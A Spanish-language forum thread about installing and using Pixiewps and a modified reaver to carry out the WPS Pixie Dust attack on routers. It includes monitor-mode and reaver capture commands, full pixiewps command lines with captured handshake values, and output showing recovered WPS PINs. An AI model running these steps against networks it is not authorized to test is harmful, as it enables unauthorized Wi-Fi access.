El libre pensamiento para un internet libre
No estas registrado.
Nombre del programa : Pixiewps
Autor : wiire
Licencia : GPL v3 (código libre)
Fecha de publicación : 03-abril-2015
Hilo oficial : Pixiewps: wps pixie dust attack tool ( Kali Linux Forum)
Repositorios oficiales : wiire/pixiewps (Github)
Descripción: Pixiewps permite el brute force offline de los PIN WPS en los dispositivos con una entropía nula o débil (ataque pixie dust).
Todos los créditos para el descubrimiento de la brecha van a Domique Bogart
Lenguaje : C
Dependencias fundamentales : aircrack-ng, reaver, gcc, lib.pcap0.8-dev...
Distribución : creado con y desarrollado para Kali linux
Registro de cambios : version 1.1 publicada el 01-05-2015
version 1.2.2 publicada el 04-01-2016
version 1.3 publicada el 07-10-2017
Vídeo de demostración oficial (hecho por soxrok2212 )
Lo primero es descargar la herramienta. Lo podemos hacer desde nuestra consola así :
wget https://github.com/wiire/pixiewps/archive/master.zip
O desde nuestro navegador : wiire/pixiewps en GitHub
Y descomprimirlo
unzip master.zip
El resultado
Archive: master.zip
1aea6eb634ef7d883bccff28695db57320c1040b
creating: pixiewps-master/
inflating: pixiewps-master/.gitattributes
inflating: pixiewps-master/README.md
creating: pixiewps-master/src/
inflating: pixiewps-master/src/Makefile
inflating: pixiewps-master/src/pixiewps.c
Se nos ha creado una nueva carpeta "pixiewps-master" que contiene el fichero "readme" y que contiene otra carpeta, "src" dónde encontramos el código y el "makefile".
# INSTALLATION
Pixiewps can be built and installed by running:
```
~/pixiewps$ cd src
~/pixiewps/src$ make
~/pixiewps/src$ sudo make install
```# USAGE
```
Usage: pixiewps <arguments>Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : E-Hash1
-z, --e-hash2 : E-Hash2
-a, --authkey : Key used in HMAC SHA-256Optional Arguments:
-n, --e-nonce : Enrollee nonce
-S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)-h, --help : Display this usage screen
la instalación es simple y los argumentos son pocos : una herramienta muy fácil de uso
Serán necesarias algunas dependencias que no están incluidas por defecto en Kali
Actualizaremos primero nuestra lista de repositorios y nuestro sistema
sudo apt-get update && sudo apt-get upgrade
Y instalamos las dependencias
sudo apt-get install libsqlite3-dev
sudo apt-get install libpcap-dev
sudo apt-get install sqlite3
Al grano... : desde nuestra terminal, nos situamos en nuestro directorio src a dentro de la nueva carpeta "pixewps master"
cd pixiewps-master/src/
lanzamos la compilación :
make
Instalamos con
sudo make install
Y antes de lanzar el programa no olvidaros de atribuirle permisos por si las moscas
chmod 777 pixiewps
chmod +x pixiewps
( en la misma terminal, siempre situados en "src")
Necesitamos también un reaver (o bully) modificado. La mejor opción es sin duda la mod de srocokx1121 que nos procuramos aquí : Modified Reaver 1.5 (mediafire)*
Edit
Existe ahora reaver 1.5.2 con soporte pixie dust y está instalado por defecto en Kali Linux. Podéis actualizarlo (recomendado) así:
git clone https://github.com/rofl0r/reaver-wps-fork-t6x.git && cd reaver* && cd src && ./configure && make && sudo make install
Con lo cual se pueden olvidar de las instrucciones que siguen (hasta "sudo make install")
Una vez el reaver modificado descargado atribuimos los permisos necesarios al fichero de configuración de nuestro reaver modificado
chmod 755 '/reaver-wps-fork-read-only/src/configure'
Y podemos instalar... nos situamos
cd '/reaver-wps-fork-read-only/src/'
lanzamos la compilación
./configure
make
Y instalamos
sudo make install
NB: La modificación de reaver es solo para "pillar" al vuelo algunos elementos procesados interiormente por reaver. No afecta lo mas mínimo el comportamiento de la herramienta en sí. No es necesario volver a instalar la versión "clásica" de reaver.
¡A pixie dustear!
Publicaré enseguida un segundo post con un ejemplo de uso.
Edit
Regalo de la casa:
Versión ya compilado para Windows por Patcher en respuesta #23
Desconectado
Estoy intentando instalarla en ubuntu pero me da error, no encuentra el directorio.
Lo que hago basicamente es, despues de extraer me sitúo dentro de la capeta src con "abrir terminal aqui" y copio y pego los codigos de instalación que bienen en el readme.
Por cierto el video que has puesto de demostración lo han borrado.
Desconectado
cuando tendre un momento hara un tutorial para ubuntu... historias de depoendencias.... tengo muchas cosas por hacer, en kali era necesario instalar libsqlite3-dev y libpcap-dev sqlite3...
estoy aun probando cosas bajo kali, cuando acabare vuelvo a mi xubuntu y te pondre la solución.(incluso a lo mejor hago un mini-tuto desde 0 en ubuntu"
tengo que hacer bastante cosas... ya nos vemos luego.
PD: el video se ha quitado un momento para mejorar la calidad ya que no era HD pero 480 ps.
se volvera a colocar enseguida cuando este renderizado
tengo pensado hacer uno en castellano también
tiempo, tiempo, ¿dónde puedo comprar tiempo?
Desconectado
Muchas gracias por tus aclaraciones, seguro que cuando tengas tiempo haces un buen manual con buenos graficos como nos tienes acostumbrados
Desconectado
Muy simple...
Tenemos ya a nuestro reaver mod instalado y a nuestro pixiewps en nuestro Kali linux
Espero no aprenderlos algo nuevo
para detectar nuestra(s) interfaz(ces)
(sudo) airmon-zc
seguido de
(sudo) airmon-zc start <interfaz>
para activar el mode monitor
Uso wash en el canal de mi punto de acceso
(sudo) wash -i wlan1mon -c 12
WPS abierto y operativo. Copiamos el bssid para pegar lo en nuestra linea de ordenes reaver.
Detallo los argumentos empleados en mi liña de orden
sudo reaver -i wlan1mon -b 00:A0:26:XX:XX:XX -g 1 -n -vv -S -c 12
-i wlan1mon : indicamos la interfaz en mode monitor
-g 1 : pedimos que reaver proba un solo PIN (no me funciono en la md, habrá que mirar esto)
-b blablabla : ponemos la dirección mac de nuestro router que hemos copiado antes porque somos listos
-n : siempre aconsejable cuando usamos reaver
-vv : "ful verbose" para tener un maximo de detalles en consola
-S : va hacer que vamos a usar llaves diffie hellman cortas lo que nos va ahorrar tener que entrar la PKR en pixiewps. Lo explico luego en el próximo paso
-c 12 : indico el numero del canal de mi router
El ataque se desarrollará y paramos con [CTRL+C] una vez que hemos mandado un PIN. Podemos en consola varias cadenas de hash que corresponden a los elementos que necesitamos para efectuar el ataque pixie dust.
Debemos estar situados en nuestro directorio "src" para lanzar pixiewps. Si llamaos pixiewps sin argumentos obtenemos la ayuda:
kcdtv@kali:~/Downloads/pixiewps-master/src$ ./pixiewps
Pixiewps made by wiire
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : E-Hash1
-z, --e-hash2 : E-Hash2
-a, --authkey : Key used in HMAC SHA-256Optional Arguments:
-n, --e-nonce : Enrollee nonce
-S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)-h, --help : Display this usage screen
Notáis que para realizar el ataque necesitamos entrar 5 elementos : PKE, PKR, auh_key, EHASH1 y EAHS2
Pero como hemos empleado en reaver anteriormente el opción -S prescindiremos de entrar la PKR y podremos en lugar en nuestra linea pixiewps simplemente "-S"
entonces copiamos y pegamos los elementos de uno en uno:
¡Y si obtenemos un PIN es el bueno! (sino no obtenemos nada)
simplemente añadimos el argumento -p con el PIN validó que hemos encontrado a la liña que hemos usado anteriormente (flecha arriba en consola para volver a ella)
Y lanzamos el ataque como de costumbre
voilà.
atim, no se si tendré tiempo de hacer el manual de instalación para ubuntu esta noche aún no he cocinado mi cena , mañana prometido lo tienes...
saludos
Desconectado
atim, no se si tendré tiempo de hacer el manual de instalación para ubuntu esta noche aún no he cocinado mi cena , mañana prometido lo tienes...
Ok, muchas gracias. Por cierto, esta herramienta sirve para los broadcom?
Desconectado
Por supuesto.
Por esto la espera, había que codificar el broadcom
he abierto un tema para lo de instalrlo en ubuntu y he actualizado el primer post con el video re-subido
es mejor si ponéis la definición en HD 720, se ve borroso en 480.p
a ver este tema de hmac 256 en ubuntu Nos vemos ahí
Desconectado
Acabo de hacerla funcionar, la he probado con un broadcom y ha sido negativo. Me ha puesto;
[-] WPS pin not found!
Time taken: 0 s
Entiendo que lo he hecho bien, pero que el roouter no es vulnerable.
Ultima edición por atim (04-04-2015 02:05:56)
Desconectado
Buena noticia para wiire.
Es siempre agradable ver su trabajo reconocido
Hoy ha sido felicitado por Dominique Bongard en persona en twiter
@ atim Has bien entendido, si tienes esta pantalla es que lo has hecho bien pero el routeur no es vulnerable.
Si no lo haces bien te sale la ayuda en lugar de este mensajes o del PIN
Desconectado
Holas de nuevo ya me he instalado la herramienta bajo kali linux sin ningún problema, el tuto es muy claro y sencillo, ahora toca hacer pruebas
Saludos!
Desconectado
¡Ya esta!
Wiire a oficialmente lanzado la primera "nueva versión" de pixiewps.
La podemos descargar y instalar como explicado en primer post.
Unos cambios mayores intervienen y justifican una nueva versión.
Como les expliqué en este hilo : Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!, gracias a la ayuda de Dominique Bongard, hemos averiguado en que relateck se basaba para definir la semilla empleada en el intercambio de llaves Diffie Hellmann.
unos routers realteck se pueden "crackear" inmediatamente ya que si mandamos el PIN en un segundo las cadenas secretas ES-1 y ES-2 son iguales al e-nounce (emitido en claro)
En otros routers no es el caso.
La semilla empleada corresponde al "utlimo build" (la fecha exata del primer lanzamiento tras la instalación de un firmware)
Por lo tanto debemos realizar un brute force de esta semilla,
Es decir ir comprobando segundo tras segundo el estado del PRNG
Force Pixiewps to bruteforce the whole keyspace for mode 4.
It could take up to several minutes to complete.
y en estas captura un ataque contra un nuevo dispositivo soportado usando la nueva opción -f
Con la nuevo opción -m podremos entrar el registrar nonce que sale en los M
-m, --r-nonce
Registrar's nonce, found in M2.
Y con esto podremos tener sin necesidad de reaver mod la "authkey" si hemos usado llaves diffie hellmann pequeñas.
- AuthKey computation if --dh-small is specified (also in Reaver). The data can be gathered from a .cap file (manually)
....a continuación podemos ver una captura de pantalla con un attaque pixie dust exitoso sin entrar el argumento -a + authkey
y estas otras están hechas contra un totolink 301rt con el nuevo ataque "brute force semila"
Desconectado
Hola buenas;
Para instalar esta nueva versión dices que hay que volver a repetir todos los pasos de igual forma?
Lo digo porque lo he hecho así pero sigo con la misma versión que tenía, no se si habŕe hecho algo mal. Se sabe algúna mac nueva afectada por realtek ?
Un saludo.
Desconectado
No se que haces, lo suyo sería que pongas aqui los pasos que ha seguido...
El programa se instala muy bien encima de la antigua versión...
¿ A lo mejoir no te has situado en la carpeta src que contiene el makefile?
1) descargar
wget https://github.com/wiire/pixiewps/archive/master.zip
2) descomprimir los ficheros
unzip pixiepws-master.zip
mirra que no tengas la antigua carpeta descomprimida en el mismo directorio que para la nueva para que no se mezclen
3) situar se (en el directorio dónde tienes el "makefile" es decir : /pixiewps-master/src )
cd /pixiewps-master/src
4) Compilar con make:
make
5) y instalar (con derechos de administrador)
sudo make install
Desconectado
Gracias, ahora estoy de viaje. En cuanto llegue a casa lo hago de nuevo y te cuento.
Desconectado
El amigo wiire ha publicado este 6 de enero una actualización de su herramienta para efectuar ataques "pixiedust" : pixiewps
(gracias a dk' por pegarnos el toque )
El programa lleva mejoras de código así que tres nuevas opciones.
Vamos a ver las enseguida...
Para " actualizar" simplemente instalamos la nueva versión sobre la vieja...
Descargar
git clone https://github.com/wiire/pixiewps.git
Situar la consola
cd pixiewps/src
Compilar
make
Instalar
sudo make install
Wiire ha conseguido quitar una dependencia : OpenSSL
Gracias a sus códigos caseros para generar los ashes pixiewps es ahora mucho mas rápido para encontrar los PIN.
con pixiewps 1.1 hacía un brute force sobre un año en 6 minutos.
Con el nuevo pixiewps 1.2 mi brute force completo sobre 3 años ha tomado tres minutos...
Estas son las tres ocpiones
--mode N[,... N] : Mode selection, comma separated [Auto]
--start [mm/]yyyy : Starting date (only mode 3) [Current time]
--end [mm/]yyyy : Ending date (only mode 3) [-3 days]
--mode N[,... N] : Mode selection, comma separated
con mode slection podemos definir el método de crack empleado. el modo 1 corresponde a ralink (ES1 y ES2 = 0 ), el modo 2 corresponde a broadcom (intervalo de semilla conocido) y el modo 3 es oara realteck (brute force tiempo sobre la semila )
--start [mm/]yyyy : Starting date (only mode 3) [Current time]
Nos permite definir con que fecha empieza el brute force cuando se trata de chipset realteck. por defecto se usa la fecha del día presente
--end [mm/]yyyy : Ending date (only mode 3) [-3 days]
nos permite definir cuando parrar el brute force. (por defecto volvemos tres días atrás la fecha de hoy[/*]
ilustración :
voy a atacar mi routeur que salió en agosto 2012 para el cual tres minutos de brute force han sido necesarios
Para hacer un brute force sobre el mes que me interesa (agosto 2012) debo añadir estos argumentos a mi linea pixiewps
--start 08/2012 --end 09/2012
El mismo router crackeado en tres segundos en lugar de tres minutos gracias a las nuevas opciones
Desconectado
Estos días he avanzado un poco en mi objetivo y ya he conseguido obtener el AuthKey. Salvo que me equivoque esta es la primera implementación documentada de la automatización del procedimiento PixieDust bajo el sistema operativo windows:
Bajo windows yo no lo he visto en ninguna parte, y vosotros ¿lo habéis visto en algún sitio?.
Desconectado
comunicado
Por problemas de plagiado (ai, ai : Es un mundo cruel ahí afuera) se ha decidido crear un hilo aparte sobre el trabajo del Pacher para darle todo la visibilidad que se merece.
Si quieres informarte sobre la implementación completa de los tres ataques Pixie Dust conocidos en Windows; te invitamos a leer este hilo:
¿Pixie WPS en Windows completo y sin fallos?
....Parece que aa a ser que si...
¡Buena lectura!
Podrás decir a tus niet@s:
- "¿Sabéis que yo he visto en 2016 el vidéo original pixie dust en windows? Eran otros tiempos... Eramos jóvenes y guapos... unos pioneros del wifi..."
Probablemente te responderán:
- "¡Otra vez con el puto pixe dust WPS en windows! Son las 8 de la mañana ya ya nos ha contado tres veces esta historia que nos cuentas cada vez que te hacemos una visita"
Al cúal podrás responder:
- "Tsssssssss... Me importa un pimiento mocosos babosos y tendréis que escuchar la historia las veces que haga falta si queréis tocar algo de la herencia... Hoy en día no hay respeto... "
Cierro esta paréntesis (antes de ello un pequeño "¡Enhorabuena campeón!" @ Parcher ) y seguimos en este hilo hablando del pixiewps del amigo wiire
Desconectado
Estaba haciendo pruebas con un router de vodafone y me he dado cuenta de lo siguiente:
Fijaros en el resultado de PixieWps
[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
He vuelto a lanzar pixiewps, esta vez con el parametro "-f" como sugiere el mensaje, pero el proceso se vuelve interminable y despues de una hora lo he detenido.
He de decir tambien que en este hilo no he visto que se haga mención a tal parametro y el help de la versión 1.2 del pixiewps que estoy empleando no lo muestra como tal
Pixiewps 1.2 WPS pixie dust attack tool
Copyright (c) 2015-2016, wiire <wi7ire@gmail.com>
Usage: pixiewps.exe <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee hash-1
-z, --e-hash2 : Enrollee hash-2
-a, --authkey : Authentication session key
-n, --e-nonce : Enrollee nonce
Optional Arguments:
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [3]
-h : Display this usage screen
--help : Verbose help and more usage examples
-V, --version : Displays version
--mode N[,... N] : Mode selection, comma separated [Auto]
--start [mm/]yyyy : Starting date (only mode 3) [Current time]
--end [mm/]yyyy : Ending date (only mode 3) [-3 days]
Example:
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
¿Sabeis algo acerca de este parametro "--force"?
Por otro lado normalmente estoy lanzado pixiewps solamente con los parametros requerido:
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : E-Hash1
-z, --e-hash2 : E-Hash2
-a, --authkey : Key used in HMAC SHA-25
Así que siguiendo la magistral guia de Kcdtv
--mode N[,... N] : Mode selection, comma separated
con mode slection podemos definir el método de crack empleado. el modo 1 corresponde a ralink (ES1 y ES2 = 0 ), el modo 2 corresponde a broadcom (intervalo de semilla conocido) y el modo 3 es oara realteck (brute force tiempo sobre la semila )
he probado a indicarle tambien el tipo de modo, el 1 en este caso:
pixiewps.exe -a 4D:CF:13:50:70:20:0C:A3:CE:
83:DE:B5:65:3C:F4:E1:F8:AB:31:FA:56:C8:34:49:54:7D:14:79:9B:9B:AE:5C -e DF:65:62
:BD:1B:E6:29:89:85:91:4C:25:3A:61:20:E2:5E:DC:F8:BE:36:6A:30:1C:0E:C5:54:A8:2A:9
4:D2:83:A1:D6:4E:D4:9A:35:C2:57:5C:87:4D:D4:39:34:9F:83:E3:B9:79:34:21:07:E1:91:
31:B5:A9:4D:36:60:DD:99:0A:EB:00:28:8F:79:E4:FA:46:9E:74:94:2B:36:B1:05:B6:29:98
:E1:8D:B6:C0:04:5D:B5:77:45:6F:9E:C2:69:5D:C7:F6:39:C8:CC:77:40:D1:85:A3:A8:A2:6
D:F0:53:D8:A7:41:9D:C0:56:83:9A:CA:F4:D8:2A:EB:CA:DE:E3:6A:EE:99:89:29:DD:5B:DC:
57:DD:F7:08:EA:19:74:68:66:D1:08:E3:E8:5D:1F:C0:12:CF:83:AE:70:21:FF:6C:54:DA:09
:71:EB:2B:79:58:4B:A3:E0:8D:31:3C:AB:13:15:A0:1E:D7:FD:A4:94:B8:BD:B4:CE:5A:CA:E
7:66:10 -r 3A:56:6C:E7:E4:C6:C0:ED:E8:D6:06:87:E7:09:DB:48:0D:9E:B1:0F:A4:A1:BE:
F1:4D:17:05:51:41:14:80:47:0E:7A:AB:9D:6E:E4:52:91:63:E0:E2:31:C9:6A:17:95:15:D2
:28:D7:48:A9:D3:AB:D0:93:0E:C1:50:79:3A:60:26:0C:9C:2B:74:B1:FB:6B:37:3B:BD:07:F
8:ED:D9:C7:C9:F8:14:A0:6B:C1:1D:97:BC:25:3B:64:2F:0B:0C:2A:31:72:4B:BB:40:C4:A4:
E4:89:21:E8:40:06:2D:DB:B2:0A:77:A7:7A:6F:50:5A:35:5E:E4:26:55:E5:C5:01:89:1B:87
:44:57:63:03:4A:B4:41:EB:F7:DA:CD:EF:CF:D6:44:E2:7F:34:46:74:1A:08:84:9C:DF:85:6
7:AE:7E:A7:73:55:3C:C7:DA:6D:7E:39:60:D7:D8:5A:CA:E2:29:D9:79:F0:F7:E0:60:6D:74:
41:FC:8E:8A:CB:26:DE:E4:D3 -s A0:5B:C1:93:91:B5:6F:A8:11:6A:05:28:27:46:0E:E3:56
:D4:00:79:E0:AC:A3:75:53:24:3E:3C:30:7C:7D:51 -z E7:5C:79:62:46:EB:5E:4D:13:E8:0
E:03:F9:63:A9:B5:0F:C8:85:F6:8C:5F:12:46:EB:98:0B:2B:34:46:F9:F7 -n 14:6E:99:9D:
7E:3B:F8:BE:14:78:51:76:06:47:A9:55 --mode 1
Pixiewps 1.2
[*] Mode: 1 (RT/MT)
[*] PSK1: d6:8b:14:d2:d2:ad:24:be:50:54:d0:e8:b8:d1:80:f5
[*] PSK2: 36:50:dd:ec:ba:16:49:60:c6:43:3a:87:e7:27:40:9a
[*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[+] WPS pin: 25976823
[*] Time taken: 0 s 62 ms
Ahora sí que ha encontrado el PIN. Por lo que saco la conclusión de que es mejor indicar este campo en lugar de dejarlo en modo automático. ¿Que opinais?, ¿Ha de hacerse así?, ¿Es fiable el modo automático?.
Desconectado
Buenas noches.
Interesante
Es la primera vez que veo un fail sobre ralink.
¿Puedes probar indicando la nounce y sin indicar el modo ralink (1)?
Sobre la opción --force ha desaparecido y es porque pixiewps detecta la PKE fija realtek y lanzará el brute force completo automáticamente si no se encutra con el inetrvalo reucido
Lo que ha motivado este cambio es también que pixiewps es mucho mas eficiente y que el ataque completo se hace en unos minutos en lugar de 20 o más.
Con lo cúal no molestará mucho el usuario...
Con el tuyo hast probablemente vuelto hacía 1970 que es el limite y faltará al codigó unas instrucciones para cerrar en modo error,
Intentare hablar con wire pero no se deja ver mucho últimamente...
Pienso que el modo automático es fiable dando todos los datos (incluyendo la nounce) o esto me parecía...
Desconectado
el modo automatico funciona asi la mayoria de la veces con los paramentro requerido pero estaria bien tener el modo manual, para proposito de prueba donde el modo automatico puede falla en cierto encenario.
viver y ser libre
Desconectado
Es un bug con la ultima revisión-
El PIN sale con la 1.2 sin tener que especificar el modo de ataque.
He escrito a wire para que lo arregle.
¡Gracias Patcher!
Cazador de trolls y de bugs...
Desconectado
Ayer salió un nueva revisión de pixiepws y se ha arreglado el bug encontrado por Patcher .
Acabo de probarla con los datos "rebeldes":
Pixiewps encuentra automáticamente le PIN en menos de un segundo sin que tengamos que indicar el modo.
Saludos y gracias desde aquí al maestro wiire.
Desconectado
Buena noticia, la estaba esperando.
pixiewps.exe -a 4D:CF:13:50:70:20:0C:A3:CE:
83:DE:B5:65:3C:F4:E1:F8:AB:31:FA:56:C8:34:49:54:7D:14:79:9B:9B:AE:5C -e DF:65:62
:BD:1B:E6:29:89:85:91:4C:25:3A:61:20:E2:5E:DC:F8:BE:36:6A:30:1C:0E:C5:54:A8:2A:9
4:D2:83:A1:D6:4E:D4:9A:35:C2:57:5C:87:4D:D4:39:34:9F:83:E3:B9:79:34:21:07:E1:91:
31:B5:A9:4D:36:60:DD:99:0A:EB:00:28:8F:79:E4:FA:46:9E:74:94:2B:36:B1:05:B6:29:98
:E1:8D:B6:C0:04:5D:B5:77:45:6F:9E:C2:69:5D:C7:F6:39:C8:CC:77:40:D1:85:A3:A8:A2:6
D:F0:53:D8:A7:41:9D:C0:56:83:9A:CA:F4:D8:2A:EB:CA:DE:E3:6A:EE:99:89:29:DD:5B:DC:
57:DD:F7:08:EA:19:74:68:66:D1:08:E3:E8:5D:1F:C0:12:CF:83:AE:70:21:FF:6C:54:DA:09
:71:EB:2B:79:58:4B:A3:E0:8D:31:3C:AB:13:15:A0:1E:D7:FD:A4:94:B8:BD:B4:CE:5A:CA:E
7:66:10 -r 3A:56:6C:E7:E4:C6:C0:ED:E8:D6:06:87:E7:09:DB:48:0D:9E:B1:0F:A4:A1:BE:
F1:4D:17:05:51:41:14:80:47:0E:7A:AB:9D:6E:E4:52:91:63:E0:E2:31:C9:6A:17:95:15:D2
:28:D7:48:A9:D3:AB:D0:93:0E:C1:50:79:3A:60:26:0C:9C:2B:74:B1:FB:6B:37:3B:BD:07:F
8:ED:D9:C7:C9:F8:14:A0:6B:C1:1D:97:BC:25:3B:64:2F:0B:0C:2A:31:72:4B:BB:40:C4:A4:
E4:89:21:E8:40:06:2D:DB:B2:0A:77:A7:7A:6F:50:5A:35:5E:E4:26:55:E5:C5:01:89:1B:87
:44:57:63:03:4A:B4:41:EB:F7:DA:CD:EF:CF:D6:44:E2:7F:34:46:74:1A:08:84:9C:DF:85:6
7:AE:7E:A7:73:55:3C:C7:DA:6D:7E:39:60:D7:D8:5A:CA:E2:29:D9:79:F0:F7:E0:60:6D:74:
41:FC:8E:8A:CB:26:DE:E4:D3 -s A0:5B:C1:93:91:B5:6F:A8:11:6A:05:28:27:46:0E:E3:56
:D4:00:79:E0:AC:A3:75:53:24:3E:3C:30:7C:7D:51 -z E7:5C:79:62:46:EB:5E:4D:13:E8:0
E:03:F9:63:A9:B5:0F:C8:85:F6:8C:5F:12:46:EB:98:0B:2B:34:46:F9:F7 -n 14:6E:99:9D:
7E:3B:F8:BE:14:78:51:76:06:47:A9:55
Pixiewps 1.2
[*] Mode: 1 (RT/MT)
[*] PSK1: d6:8b:14:d2:d2:ad:24:be:50:54:d0:e8:b8:d1:80:f5
[*] PSK2: 36:50:dd:ec:ba:16:49:60:c6:43:3a:87:e7:27:40:9a
[*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[+] WPS pin: 25976823
[*] Time taken: 0 s 45 ms
Ahora si, rápido y sin necesidad de indicar el modo. Perfecto!!. Desde aquí también mi agradecimiento a Wiire.
Los usuarios de Linux lo tienen más fácil para compilar este tipo de herramientas en cambio en Windows hay que dar un par de vueltas y no todos los usuarios saben como. Así que para celebrar que tenemos nueva versión, adjunto un compilado para windows PixieWps_1_2_2-Windows.zip, para que quien quiera lo pueda probar también en Windows.
Ultima edición por Patcher (12-02-2017 21:17:39)
Desconectado
Añado un link hacía tu mensaje en primer post para que no pase desparecido.
The Wiire.
Esta serie no la he visto....
Buena noticia, la estaba esperando
Le había escrito un mail para comentárselo.
Resulta que no abre más su mail de contacto git hub porque lo tiene "flooded" por gente que pide asistencia para crackear routers.
Al final un día salí en una conversación con soxrock2212, le comenté que habías tenido un fail raro con Ralink y lo ha contactado por "vía privilegiada".
Se hubiera podido arreglar hace tiempo...
Desconectado
Hace unos días atrás Binnarymaster (del foro antichat.ru) ha presentado en Git Hub una actualización muy interesante.
Recuerdo que es a binnarymaster que debemos la opción "-p with arbitrary string" de reaver 1.6.1 que permite mandar un PIN "NULL" o un PIN que no respecta la regla del Checksum (o la cadena que queremos)
Ver: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN
Total que pixiewps no considera la posibilidad de un resultado "NULL" (no valor) y nuestro ataque pixiewps no encontrará el PIN vació
Binnarymaster ha adaptado el código de pixiewps para crackear también los PIN vacíos.
El otro aporte es relativo al ataque de fuerza bruta sobre semilla tiempo.
La vulnerabilidad de los Puntos de Acceso con chipset WiFi Realtek.
El brute force se hace con un diccionario de PIN "legales"
Es decir: 8 dígitos y el último dígito es una suma de comprobación de los siete precedentes (y por lo tanto "fijo")
Si nuestro router está configurado con un PIN que no respecta la regla del Checksum el ataque fallaría.
No se comprobaría el PIN 12345671 (PIN no conforme).
Se comprobaría 12345670 (PIN conforme) y no se encontraría el PIN 12345678 "mal-formado"
El crack de PIN vacío es una sola posibilidad y se hace automáticamente.
Para habilitar el crack de PIN sin checksum emplearemos la opción -l
-l, --length : Brute-force entire pin length (experimental)
Otra cosa (me parece muy bien): Binnarymaster ha vuelto a introducir la opción -f (--force) para forzar el lanzamiento del Brute Force.
Wiire la ha quitado porqué pixiewps detecta automáticamente los PA vulnerables.
El problema es que el sistema no era sin fallos y es de todo modo mejor tener la posibilidad de probar lo que queremos.
Para probar la versión de binnarymaster debéis descargarla desde Git Hub
git clone https://github.com/binarymaster/pixiewps.git
Situar la terminal en la rama descargada
cd pixiewps/src/
Compilar
make
Instalar
sudo make install
¡Y listo!
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
¡Vienen grandes cambios! por Takomou
|
2 | 166 | Hoy 15:25:52 por Patcher |
Pegado: |
521 | 339980 | 10-05-2023 18:24:28 por Betis-Jesus |
|
27 | 1242 | 09-05-2023 21:32:44 por kcdtv |
Hacktivismo por CHARGER22
|
1 | 205 | 08-05-2023 19:53:26 por kcdtv |
Pegado: |
447 | 66089 | 22-04-2023 15:31:13 por kcdtv |
Ultimo usuario registrado: klurosu
Usuarios registrados conectados: 0
Invitados conectados: 5
Número total de usuarios registrados: 2,446
Número total de temas: 1,637
Número total de mensajes: 15,586
Atom tema feed - Impulsado por FluxBB